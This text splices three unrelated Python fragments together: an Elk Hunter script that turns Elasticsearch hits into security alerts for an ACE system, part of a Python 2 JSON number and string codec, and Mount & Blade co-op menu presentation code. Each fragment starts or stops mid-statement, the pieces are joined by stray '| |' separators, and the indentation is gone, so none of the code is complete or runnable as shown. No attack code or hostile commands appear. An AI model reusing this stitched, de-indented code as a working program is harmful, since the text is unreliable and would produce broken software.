if "_source" in alert_result:
combined_results.update(alert_result["_source"])
if "fields" in alert_result:
combined_results.update(alert_result["fields"])
if group_by_value is None:
alerts[tmp_key] = [combined_results]
tmp_key += 1
elif group_by_value in combined_results:
if isinstance(combined_results[group_by_value], list):
tmp_key = ", ".join(combined_results[group_by_value])
else:
tmp_key = combined_results[group_by_value]
if tmp_key not in alerts:
alerts[tmp_key] = []
alerts[tmp_key].append(combined_results)
else:
alerts["null"] = combined_results
if alerts:
logging.debug("{}".format(json.dumps(alerts)))
else:
logging.debug("no results")
for alert_key in alerts.keys():
alert_title = '{} - {}'.format(self.config['rule']['name'], alert_key)
# alert type defaults to elk but you can override
alert_type = 'elk'
if 'type' in self.config['rule']:
alert_type = self.config['rule']['type']
alert = Alert(
tool='elk',
tool_instance='elk_hunter',
alert_type=alert_type,
desc=alert_title,
event_time=time.strftime("%Y-%m-%d %H:%M:%S"),
#details=alert_key,
details=alerts[alert_key],
name=self.config['rule']['name'],
company_name=CONFIG['ace']['company_name'],
company_id=CONFIG['ace'].getint('company_id'))
# extract tags
if 'tags' in self.config['rule']:
for tag in self.config['rule']['tags'].split(','):
alert.add_tag(tag)
# extract observables
for observables in alerts[alert_key]:
# is this observable type a temporal type?
o_time = observables['_time'] if '_time' in observables else None
if o_time is not None:
m = re.match(r'^([0-9]{4})-([0-9]{2})-([0-9]{2})T([0-9]{2}):([0-9]{2}):([0-9]{2})\.[0-9]{3}[-+][0-9]{2}:[0-9]{2}$', o_time)
if not m:
logging.error("_time field does not match expected format: {0}".format(o_time))
else:
# reformat this time for ACE
o_time = '{0}-{1}-{2} {3}:{4}:{5}'.format(
m.group(1),
m.group(2),
m.group(3),
m.group(4),
m.group(5),
m.group(6))
for o_field in self.config['observable_mapping'].keys():
if o_field not in observables:
logging.debug("field {} does not exist in event with observables {}".format(o_field,observables))
continue
o_type = self.config['observable_mapping'][o_field]
if isinstance(observables[o_field], list):
o_values = observables[o_field]
else:
o_values = [ observables[o_field] ]
for o_value in o_values:
# ignore values that are None, empty string or a single -
if o_value is None:
continue
# make sure this is a string
if not isinstance(o_value, str):
o_value = str(o_value)
if o_value.strip() == '' or o_value.strip() == '-':
continue
alert.add_observable(o_type,
o_value,
o_time if self.is_temporal_field(o_field) else None,
directives=self.get_field_directives(o_field))
if CONFIG['ace'].getboolean('enabled'):
try:
logging.info("submitting alert {}".format(alert.description))
alert.submit(CONFIG['ace']['uri'], CONFIG['ace']['key'])
except Exception as e:
logging.error("unable to submit alert {}: {}".format(alert, str(e)))
logging.debug(str(alert))
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Elk Hunter")
parser.add_argument('-b', '--base-directory', required=False, default=None, dest='base_dir',
help="Path to the base directory of the Elk Hunter tool. "
"Defaults to /opt/elk_hunter. "
"Override with ELK_HUNTER environment variable.")
parser.add_argument('-c', '--config', required=False, default='etc/elk_hunter.ini', dest='config_path',
help="Path to configuration file. Defaults to etc/elk_hunter.ini")
parser.add_argument('--logging-config', required=False, default='etc/logging.ini', dest='logging_config',
help="Path to logging configuration file. Defaults to etc/logging.ini")
parser.add_argument('-r', '--rules-dir', required=False, dest='rules_dir', action='append', default=[],
help="Path to rules directory. More than one can be specified. Defaults to rules/")
parser.add_argument('-d', '--daemon', required=False, default=False, action='store_true', dest='daemon',
help="Start as daemon running automated searches. Defaults to running individual searches as specified.")
parser.add_argument('--background', required=False, default=False, action='store_true', dest='background',
help="Run the background as a service. Only applies to --daemon.")
parser.add_argument('-k', '--kill', required=False, default=False, action='store_true', dest='kill',
help="Kill a running daemon.")
parser.add_argument('--earliest', required=False, default=None, dest='earliest',
help="Replace configuration specific earliest time. Time spec absolute format is MM/DD/YYYY:HH:MM:SS")
parser.add_argument('--latest', required=False, default=None, dest='latest',
help="Replace configuration specific latest time.")
parser.add_argument('-i', '--use-index-time', required=False, default=None, action='store_true', dest='use_index_time',
help="Use __index time specs instead.")
parser.add_argument("searches", nargs=argparse.REMAINDER, help="One or more searches to execute.")
#subparsers = parser.add_subparsers(dest='command') #title='subcommands', help='additional help')
#manual_search_commands = [ 'cli_search']
#manual_search_parser = subparsers.add_parser('cli_search',help='search with command line')
#manual_search_parser.add_argument('--search',action='store',required=True,help='the lucene search')
#manual_search_parser.add_argument('--index',action='store',required=True,help='the elasticsearch index to search')
#manual_search_parser.add_argument('--fields',action='store',help='print the following fields instead of the entire output <comma delimited list of fieldsi>')
#manual_search_parser.add_argument('--add-field',action='store',help='3 arguments comma separated. <new_field_name>,<field_name_to_match>,<regex to match>')
#manual_search_parser.add_argument('--join-fields-with',action='store',help='comma separated list | |
or ept is not None:
break
else:
decpt = k-j
elif c in 'eE':
if ept is not None:
break
else:
ept = k-j
elif c in '+-':
if not ept:
break
esign = c
else: #digit
if not ept:
sigdigits += 1
k += 1
number = s[j:k] # The entire number as a string
#print 'NUMBER IS: ', repr(number), ', sign', sign, ', esign', esign, \
# ', sigdigits', sigdigits, \
# ', decpt', decpt, ', ept', ept
# Handle octal integers first as an exception. If octal
# is not enabled (the ECMAScipt standard) then just do
# nothing and treat the string as a decimal number.
if could_be_octal and self._allow_octal_numbers:
n = sign * decode_octal( number )
return n, k
# A decimal number. Do a quick check on JSON syntax restrictions.
if number[0] == '.' and not self._allow_initial_decimal_point:
raise JSONDecodeError('numbers in strict JSON must have at least one digit before the decimal point',s[i:])
elif number[0] == '0' and \
len(number) > 1 and number[1].isdigit():
if self._allow_octal_numbers:
raise JSONDecodeError('initial zero digit is only allowed for octal integers',s[i:])
else:
raise JSONDecodeError('initial zero digit must not be followed by other digits (octal numbers are not permitted)',s[i:])
# Make sure decimal point is followed by a digit
if decpt is not None:
if decpt+1 >= len(number) or not number[decpt+1].isdigit():
raise JSONDecodeError('decimal point must be followed by at least one digit',s[i:])
# Determine the exponential part
if ept is not None:
if ept+1 >= len(number):
raise JSONDecodeError('exponent in number is truncated',s[i:])
try:
exponent = int(number[ept+1:])
except ValueError:
raise JSONDecodeError('not a valid exponent in number',s[i:])
##print 'EXPONENT', exponent
else:
exponent = 0
# Try to make an int/long first.
if decpt is None and exponent >= 0:
# An integer
if ept:
n = int(number[:ept])
else:
n = int(number)
n *= sign
if exponent:
n *= 10**exponent
if n == 0 and sign < 0:
# minus zero, must preserve negative sign so make a float
n = -0.0
else:
try:
if decimal and (abs(exponent) > float_maxexp or sigdigits > float_sigdigits):
try:
n = decimal.Decimal(number)
n = n.normalize()
except decimal.Overflow:
if sign<0:
n = neginf
else:
n = inf
else:
n *= sign
else:
n = float(number) * sign
except ValueError:
raise JSONDecodeError('not a valid JSON numeric literal', s[i:j])
return n, k
def encode_number(self, n):
"""Encodes a Python numeric type into a JSON numeric literal.
The special non-numeric values of float('nan'), float('inf')
and float('-inf') are translated into appropriate JSON
literals.
Note that Python complex types are not handled, as there is no
ECMAScript equivalent type.
"""
if isinstance(n, complex):
if n.imag:
raise JSONEncodeError('Can not encode a complex number that has a non-zero imaginary part',n)
n = n.real
if isinstance(n, (int,long)):
return str(n)
if decimal and isinstance(n, decimal.Decimal):
return str(n)
global nan, inf, neginf
if n is nan:
return 'NaN'
elif n is inf:
return 'Infinity'
elif n is neginf:
return '-Infinity'
elif isinstance(n, float):
# Check for non-numbers.
# In python nan == inf == -inf, so must use repr() to distinguish
reprn = repr(n).lower()
if ('inf' in reprn and '-' in reprn) or n == neginf:
return '-Infinity'
elif 'inf' in reprn or n is inf:
return 'Infinity'
elif 'nan' in reprn or n is nan:
return 'NaN'
return repr(n)
else:
raise TypeError('encode_number expected an integral, float, or decimal number type',type(n))
def decode_string(self, s, i=0, imax=None):
"""Intermediate-level decoder for JSON string literals.
Takes a string and a starting index, and returns a Python
string (or unicode string) and the index of the next unparsed
character.
"""
if imax is None:
imax = len(s)
if imax < i+2 or s[i] not in '"\'':
raise JSONDecodeError('string literal must be properly quoted',s[i:])
closer = s[i]
if closer == '\'' and not self._allow_single_quoted_strings:
raise JSONDecodeError('string literals must use double quotation marks in strict JSON',s[i:])
i += 1 # skip quote
if self._allow_js_string_escapes:
escapes = self._escapes_js
else:
escapes = self._escapes_json
ccallowed = self._allow_control_char_in_string
chunks = []
_append = chunks.append
done = False
high_surrogate = None
while i < imax:
c = s[i]
# Make sure a high surrogate is immediately followed by a low surrogate
if high_surrogate and (i+1 >= imax or s[i:i+2] != '\\u'):
raise JSONDecodeError('High unicode surrogate must be followed by a low surrogate',s[i:])
if c == closer:
i += 1 # skip end quote
done = True
break
elif c == '\\':
# Escaped character
i += 1
if i >= imax:
raise JSONDecodeError('escape in string literal is incomplete',s[i-1:])
c = s[i]
if '0' <= c <= '7' and self._allow_octal_numbers:
# Handle octal escape codes first so special \0 doesn't kick in yet.
# Follow Annex B.1.2 of ECMAScript standard.
if '0' <= c <= '3':
maxdigits = 3
else:
maxdigits = 2
for k in range(i, i+maxdigits+1):
if k >= imax or s[k] not in octaldigits:
break
n = decode_octal(s[i:k])
if n < 128:
_append( chr(n) )
else:
_append( unichr(n) )
i = k
continue
if escapes.has_key(c):
_append(escapes[c])
i += 1
elif c == 'u' or c == 'x':
i += 1
if c == 'u':
digits = 4
else: # c== 'x'
if not self._allow_js_string_escapes:
raise JSONDecodeError(r'string literals may not use the \x hex-escape in strict JSON',s[i-1:])
digits = 2
if i+digits >= imax:
raise JSONDecodeError('numeric character escape sequence is truncated',s[i-1:])
n = decode_hex( s[i:i+digits] )
if high_surrogate:
# Decode surrogate pair and clear high surrogate
_append( surrogate_pair_as_unicode( high_surrogate, unichr(n) ) )
high_surrogate = None
elif n < 128:
# ASCII chars always go in as a str
_append( chr(n) )
elif 0xd800 <= n <= 0xdbff: # high surrogate
if imax < i + digits + 2 or s[i+digits] != '\\' or s[i+digits+1] != 'u':
raise JSONDecodeError('High unicode surrogate must be followed by a low surrogate',s[i-2:])
high_surrogate = unichr(n) # remember until we get to the low surrogate
elif 0xdc00 <= n <= 0xdfff: # low surrogate
raise JSONDecodeError('Low unicode surrogate must be proceeded by a high surrogate',s[i-2:])
else:
# Other chars go in as a unicode char
_append( unichr(n) )
i += digits
else:
# Unknown escape sequence
if self._allow_nonescape_characters:
_append( c )
i += 1
else:
raise JSONDecodeError('unsupported escape code in JSON string literal',s[i-1:])
elif ord(c) <= 0x1f: # A control character
if self.islineterm(c):
raise JSONDecodeError('line terminator characters must be escaped inside string literals',s[i:])
elif ccallowed:
_append( c )
i += 1
else:
raise JSONDecodeError('control characters must be escaped inside JSON string literals',s[i:])
else: # A normal character; not an escape sequence or end-quote.
# Find a whole sequence of "safe" characters so we can append them
# all at once rather than one a time, for speed.
j = i
i += 1
while i < imax and s[i] not in unsafe_string_chars and s[i] != closer:
i += 1
_append(s[j:i])
if not done:
raise JSONDecodeError('string literal is not terminated with a quotation mark',s)
s = ''.join( chunks )
return s, i
def encode_string(self, s):
"""Encodes a Python string into a JSON string literal.
"""
# Must handle instances of UserString specially in order to be
# able to use ord() on it's simulated "characters".
import UserString
if isinstance(s, (UserString.UserString, UserString.MutableString)):
def tochar(c):
return c.data
else:
# Could use "lambda c:c", but that is too slow. So we set to None
# and use an explicit if test inside the loop.
tochar = None
chunks = []
chunks.append('"')
revesc = self._rev_escapes
asciiencodable = self._asciiencodable
encunicode = self._encode_unicode_as_escapes
i = 0
imax = len(s)
while i < imax:
if tochar:
c = tochar(s[i])
else:
c = s[i]
cord = ord(c)
if cord < 256 and asciiencodable[cord] and isinstance(encunicode, bool):
# Contiguous runs of plain old printable ASCII can be copied
# directly to the JSON output without worry (unless the user
# has supplied | |
s0, 3),
(else_try),
(eq, ":cur_ai_troop_index", 8),
(overlay_set_val, reg0, "$coop_class_4_wanted"),
(assign, "$g_presentation_obj_commander_select_21", reg0),
(str_store_class_name, s0, 4),
(else_try),
(eq, ":cur_ai_troop_index", 9),
(overlay_set_val, reg0, "$coop_class_5_wanted"),
(assign, "$g_presentation_obj_commander_select_22", reg0),
(str_store_class_name, s0, 5),
(else_try),
(eq, ":cur_ai_troop_index", 10),
(overlay_set_val, reg0, "$coop_class_6_wanted"),
(assign, "$g_presentation_obj_commander_select_23", reg0),
(str_store_class_name, s0, 6),
(else_try),
(eq, ":cur_ai_troop_index", 11),
(overlay_set_val, reg0, "$coop_class_7_wanted"),
(assign, "$g_presentation_obj_commander_select_24", reg0),
(str_store_class_name, s0, 7),
(else_try),
(eq, ":cur_ai_troop_index", 12),
(overlay_set_val, reg0, "$coop_class_8_wanted"),
(assign, "$g_presentation_obj_commander_select_25", reg0),
(str_store_class_name, s0, 8),
(try_end),
(create_text_overlay, reg0, "str_s0", 0), #s0
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 430),
(position_set_y, pos1, ":cur_y"),
(overlay_set_position, reg0, pos1),
(val_sub, ":cur_y", escape_menu_item_height),#escape_menu_item_height
(try_end),
(val_sub, ":cur_y", escape_menu_item_height),
(try_end),
(presentation_set_duration, 999999),
]),
(ti_on_presentation_event_state_change,
[(store_trigger_param_1, ":object"),
(store_trigger_param_2, ":value"),
(try_begin),
(eq, ":object", "$g_presentation_obj_commander_select_11"),
(presentation_set_duration, 0),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_13"),
(assign, "$g_multiplayer_bot_type_1_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_1_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_14"),
(assign, "$g_multiplayer_bot_type_2_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_2_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_15"),
(assign, "$g_multiplayer_bot_type_3_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_3_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_16"),
(assign, "$g_multiplayer_bot_type_4_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_4_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_17"),
(assign, "$coop_class_0_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_0_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_18"),
(assign, "$coop_class_1_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_1_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_19"),
(assign, "$coop_class_2_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_2_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_20"),
(assign, "$coop_class_3_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_3_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_21"),
(assign, "$coop_class_4_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_4_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_22"),
(assign, "$coop_class_5_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_5_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_23"),
(assign, "$coop_class_6_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_6_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_24"),
(assign, "$coop_class_7_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_7_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_25"),
(assign, "$coop_class_8_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_8_wanted, ":value"),
(try_end),
]),
(ti_on_presentation_run,
[
## this causes an error sometimes
## (multiplayer_get_my_player, ":my_player_no"),
## (player_get_gold, ":player_gold", ":my_player_no"),
## (call_script, "script_multiplayer_calculate_cur_selected_items_cost", ":my_player_no", 1),
## (try_begin),
## (ge, ":player_gold", reg0),
## (overlay_set_color, "$g_presentation_obj_commander_select_12", 0xFFFFFF),
## (else_try),
## (overlay_set_color, "$g_presentation_obj_commander_select_12", 0xFF0000),
## (try_end),
(try_begin),
(key_clicked, key_escape),
(presentation_set_duration, 0),
(try_end),
]),
]),
############################################################
("coop_team_select", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(create_mesh_overlay, reg0, "mesh_mp_ingame_menu"),
(position_set_x, pos1, 250),
(position_set_y, pos1, 80),
(overlay_set_position, reg0, pos1),
(position_set_x, pos1, 1000),
(position_set_y, pos1, 1000),
(overlay_set_size, reg0, pos1),
(str_clear, s0),
(create_text_overlay, "$g_presentation_obj_team_select_container", s0, tf_scrollable_style_2),
(position_set_x, pos1, 285),
(position_set_y, pos1, 125),
(overlay_set_position, "$g_presentation_obj_team_select_container", pos1),
(position_set_x, pos1, 405),
(position_set_y, pos1, 500),
(overlay_set_area_size, "$g_presentation_obj_team_select_container", pos1),
(set_container_overlay, "$g_presentation_obj_team_select_container"),
(assign, ":cur_y", 450),
(create_text_overlay, reg0, "str_choose_a_faction", 0),
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 0),
(position_set_y, pos1, ":cur_y"),
(overlay_set_position, reg0, pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(position_set_x, pos1, 100),
(multiplayer_get_my_player, ":my_player_no"),
(team_get_faction, ":script_param_2", 0),
(str_store_faction_name, s0, ":script_param_2"),
(create_button_overlay, "$g_presentation_obj_team_select_1", s0, 0),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 0),
(overlay_set_color, "$g_presentation_obj_team_select_1", 0xFFFFFF),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_1", 0x55FF50),
(assign, "$g_multiplayer_team_select_1_available", 1),
(else_try),
(overlay_set_color, "$g_presentation_obj_team_select_1", 0x888888),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_1", 0x888888),
(assign, "$g_multiplayer_team_select_1_available", 0),
(try_end),
(position_set_y, pos1, ":cur_y"),
(overlay_set_position, "$g_presentation_obj_team_select_1", pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(team_get_faction, ":script_param_2", 1),
(str_store_faction_name, s0, ":script_param_2"),
(create_button_overlay, "$g_presentation_obj_team_select_2", s0, 0),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 1),
(overlay_set_color, "$g_presentation_obj_team_select_2", 0xFFFFFF),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_2", 0x55FF50),
(assign, "$g_multiplayer_team_select_2_available", 1),
(else_try),
(overlay_set_color, "$g_presentation_obj_team_select_2", 0x888888),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_2", 0x888888),
(assign, "$g_multiplayer_team_select_2_available", 0),
(try_end),
(overlay_set_position, "$g_presentation_obj_team_select_2", pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(create_button_overlay, "$g_presentation_obj_team_select_3", "str_spectator", 0),
(overlay_set_color, "$g_presentation_obj_team_select_3", 0xFFFFFF),
(overlay_set_position, "$g_presentation_obj_team_select_3", pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(presentation_set_duration, 999999),
]),
(ti_on_presentation_event_state_change,
[(store_trigger_param_1, ":object"),
(multiplayer_get_my_player, ":my_player_no"),
(try_begin),
(eq, "$g_waiting_for_confirmation_to_terminate", 0),
(try_begin),
(eq, ":object", "$g_presentation_obj_team_select_1"),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 0),
(try_begin),
(player_get_team_no, ":my_team", ":my_player_no"),
(neq, ":my_team", 0),
(assign, "$g_confirmation_result", 0),
(assign, "$g_waiting_for_confirmation_to_terminate", 1),
(player_get_troop_id, "$g_confirmation_troop_backup", ":my_player_no"),
(player_get_team_no, "$g_confirmation_team_backup", ":my_player_no"),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, 0),
(player_set_team_no, ":my_player_no", 0),
(assign, "$coop_my_team", 0), #
(else_try),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_troop_select"),
(try_end),
(try_end),
(else_try),
(eq, ":object", "$g_presentation_obj_team_select_2"),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 1),
(try_begin),
(player_get_team_no, ":my_team", ":my_player_no"),
(neq, ":my_team", 1),
(assign, "$g_confirmation_result", 0),
(assign, "$g_waiting_for_confirmation_to_terminate", 1),
(player_get_troop_id, "$g_confirmation_troop_backup", ":my_player_no"),
(player_get_team_no, "$g_confirmation_team_backup", ":my_player_no"),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, 1),
(player_set_team_no, ":my_player_no", 1),
(assign, "$coop_my_team", 1), #
(else_try),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_troop_select"),
(try_end),
(try_end),
(else_try),
(eq, ":object", "$g_presentation_obj_team_select_3"),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, multi_team_spectator),
(player_set_team_no, ":my_player_no", multi_team_spectator),
(assign, "$coop_my_team", multi_team_spectator), #
(presentation_set_duration, 0),
(try_end),
(try_end),
]),
(ti_on_presentation_run,
[
(multiplayer_get_my_player, ":my_player_no"),
(try_begin),
(key_clicked, key_escape),
(eq, "$g_waiting_for_confirmation_to_terminate", 0),
(multiplayer_get_my_team, ":my_team"),
(try_begin),
(eq, ":my_team", multi_team_unassigned),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, multi_team_spectator),
(player_set_team_no, ":my_player_no", multi_team_spectator),
(try_end),
(presentation_set_duration, 0),
(else_try),
(eq, "$g_waiting_for_confirmation_to_terminate", 1),
(eq, "$g_confirmation_result", 1),
(assign, "$g_waiting_for_confirmation_to_terminate", 0),
(assign, "$g_confirmation_result", 0),
(presentation_set_duration, 0),
# coop only show troop select if heroes are available
(multiplayer_get_my_team, ":my_team"),
(try_begin),
(eq, ":my_team", 0),
(party_get_num_companion_stacks, ":num_heroes", coop_temp_party_enemy_heroes),
(gt, ":num_heroes", 0),
(start_presentation, "prsnt_coop_troop_select"),
(else_try),
(eq, ":my_team", 1),
(party_get_num_companion_stacks, ":num_heroes", coop_temp_party_ally_heroes),
(gt, ":num_heroes", 0),
(start_presentation, "prsnt_coop_troop_select"),
(try_end),
(else_try),
(eq, "$g_waiting_for_confirmation_to_terminate", 1),
(eq, "$g_confirmation_result", -1),
#return troop and team back to the old state
(player_set_troop_id, ":my_player_no", "$g_confirmation_troop_backup"),
(player_set_team_no, ":my_player_no", "$g_confirmation_team_backup"),
(assign, "$g_waiting_for_confirmation_to_terminate", 0),
(assign, "$g_confirmation_result", 0),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_team_select"),
(else_try),
(assign, ":do_refresh", 0),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 0),
(try_begin),
(eq, "$g_multiplayer_team_select_1_available", 0),
(assign, ":do_refresh", 1),
(try_end),
(else_try),
#not available
(try_begin),
(eq, "$g_multiplayer_team_select_1_available", 1),
(assign, ":do_refresh", 1),
(try_end),
(try_end),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 1),
(try_begin),
(eq, "$g_multiplayer_team_select_2_available", 0),
(assign, ":do_refresh", 1),
(try_end),
(else_try),
#not available
(try_begin),
(eq, "$g_multiplayer_team_select_2_available", 1),
(assign, ":do_refresh", 1),
(try_end),
(try_end),
(eq, ":do_refresh", 1),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_team_select"),
(try_end),
]),
]),
("coop_start_battle", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(assign, "$g_presentation_obj_start_battle_1", -1),
(try_begin),
(create_in_game_button_overlay, "$g_presentation_obj_start_battle_1", "@Start battle.", 0),
(overlay_set_color, "$g_presentation_obj_start_battle_1", 0xFFFFFF),
(position_set_x, pos1, 500),
(position_set_y, pos1, 700),
(overlay_set_position, "$g_presentation_obj_start_battle_1", pos1),
(try_end),
(presentation_set_duration, 999999),
]),
(ti_on_presentation_event_state_change,
[(store_trigger_param_1, ":object"),
(try_begin),
(eq, ":object", "$g_presentation_obj_start_battle_1"),
(multiplayer_send_int_to_server, multiplayer_event_coop_send_to_server, coop_event_start_battle),
(presentation_set_duration, 0),
(try_end),
]),
(ti_on_presentation_run,
[
(eq, "$coop_battle_started", 1),
(presentation_set_duration, 0),
]),
]),
("coop_welcome_message", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(str_store_welcome_message, s0),
(try_begin),
(neg|str_is_empty, s0),
(eq, "$g_multiplayer_welcome_message_shown", 0),
(create_mesh_overlay, reg0, "mesh_mp_ui_welcome_panel"),
(position_set_x, pos1, 200),
(position_set_y, pos1, 400),
(overlay_set_position, reg0, pos1),
(create_text_overlay, reg0, s0, tf_scrollable),
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 230),
(position_set_y, pos1, 425),
(overlay_set_position, reg0, pos1),
(position_set_x, pos1, 540),
(position_set_y, pos1, 150),
(overlay_set_area_size, reg0, pos1),
(presentation_set_duration, 999999),
(else_try),
(eq, "$g_multiplayer_show_server_rules", 1),
(create_mesh_overlay, reg0, "mesh_mp_ui_welcome_panel"),
(position_set_x, pos1, 200),
(position_set_y, pos1, 400),
(overlay_set_position, reg0, pos1),
(try_begin),
(neg|str_is_empty, s0),
(str_clear, s3),
(str_store_string, s2, s0),
(str_store_string, s2, "str_s2_s3"),
(str_store_string, s2, "str_s2_s3"),
(else_try),
(str_clear, s2),
(try_end),
(str_store_string, s3, "@Game Rules:^"),
(str_store_string, s2, "str_s2_s3"),
(assign, ":end_cond", 1000),
(call_script, "script_game_multiplayer_get_game_type_mission_template", "$g_multiplayer_game_type"),
(assign, ":cur_mt", reg0),
(str_store_server_name, s0),
(str_store_string, s3, "str_server_name_s0"),
(str_store_string, s2, "str_s2_s3"),
(try_begin),
(eq, "$g_multiplayer_game_type", multiplayer_game_type_coop_battle),
(str_store_string, s0, "str_multi_game_type_9"),
(else_try),
(eq, "$g_multiplayer_game_type", multiplayer_game_type_coop_siege),
(str_store_string, s0, "str_multi_game_type_10"),
(try_end),
(str_store_string, s3, "str_game_type_s0"),
(str_store_string, s2, "str_s2_s3"),
(store_current_scene, ":cur_scene"),
# (val_sub, ":cur_scene", "scn_multi_scene_1"),
# (val_add, ":cur_scene", "str_multi_scene_1"),
# (str_store_string, s0, ":cur_scene"),
(try_begin),
(is_between, ":cur_scene", multiplayer_scenes_begin, multiplayer_scenes_end),
(store_sub, ":string_id", ":cur_scene", multiplayer_scenes_begin),
(val_add, ":string_id", multiplayer_scene_names_begin),
(str_store_string, s0, ":string_id"),
(else_try),
(call_script, "script_coop_get_scene_name", ":cur_scene"),#if not random map use party name
(try_end),
(str_store_string, s3, "str_map_name_s0"),
(str_store_string, s2, "str_s2_s3"),
(store_mission_timer_a, ":mission_timer"),
(val_add, ":mission_timer", "$server_mission_timer_while_player_joined"),
(assign, reg0, ":mission_timer"),
(store_mul, "$g_multiplayer_game_max_seconds", "$g_multiplayer_game_max_minutes", 60),
(store_sub, ":remaining_seconds", "$g_multiplayer_game_max_seconds", ":mission_timer"),
(store_div, reg0, ":remaining_seconds", 60),
(store_mod, reg1, ":remaining_seconds", 60),
(try_begin),
(ge, reg0, 10),
(ge, reg1, 10),
(str_clear, s0),
(str_clear, s1),
(else_try),
(ge, reg0, 10),
(str_clear, s0),
(str_store_string, s1, "@0"),
(else_try),
(ge, reg1, 10),
(str_store_string, s0, "@0"),
(str_clear, s1),
(else_try),
(str_store_string, s0, "@0"),
(str_store_string, s1, "@0"),
(try_end),
(str_store_string, s3, "str_remaining_time_s0reg0_s1reg1"),
(str_store_string, s2, "str_s2_s3"),
(try_for_range, ":cur_option", 0, ":end_cond"),
(assign, reg0, -12345), #magic number
(call_script, "script_game_get_multiplayer_server_option_for_mission_template", ":cur_mt", ":cur_option"),
(try_begin),
(eq, reg0, -12345),
(assign, ":end_cond", 0),
(else_try),
(call_script, "script_game_multiplayer_server_option_for_mission_template_to_string", ":cur_mt", ":cur_option", reg0),
(str_store_string, s3, s0),
(str_store_string, s2, "str_s2_s3"),
(try_end),
(try_end),
(create_text_overlay, reg0, s2, tf_scrollable),
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 230),
(position_set_y, pos1, 425),
(overlay_set_position, reg0, pos1),
(position_set_x, pos1, 540),
(position_set_y, pos1, 150),
(overlay_set_area_size, reg0, pos1),
(presentation_set_duration, 999999),
(try_end),
]),
(ti_on_presentation_run,
[
(str_store_welcome_message, s0),
(try_begin),
(neq, "$g_multiplayer_show_server_rules", 1),
(this_or_next|str_is_empty, s0),
(eq, "$g_multiplayer_welcome_message_shown", 1),
(presentation_set_duration, 0),
(neg|is_presentation_active, "prsnt_coop_escape_menu"),
(neg|is_presentation_active, "prsnt_coop_team_select"),
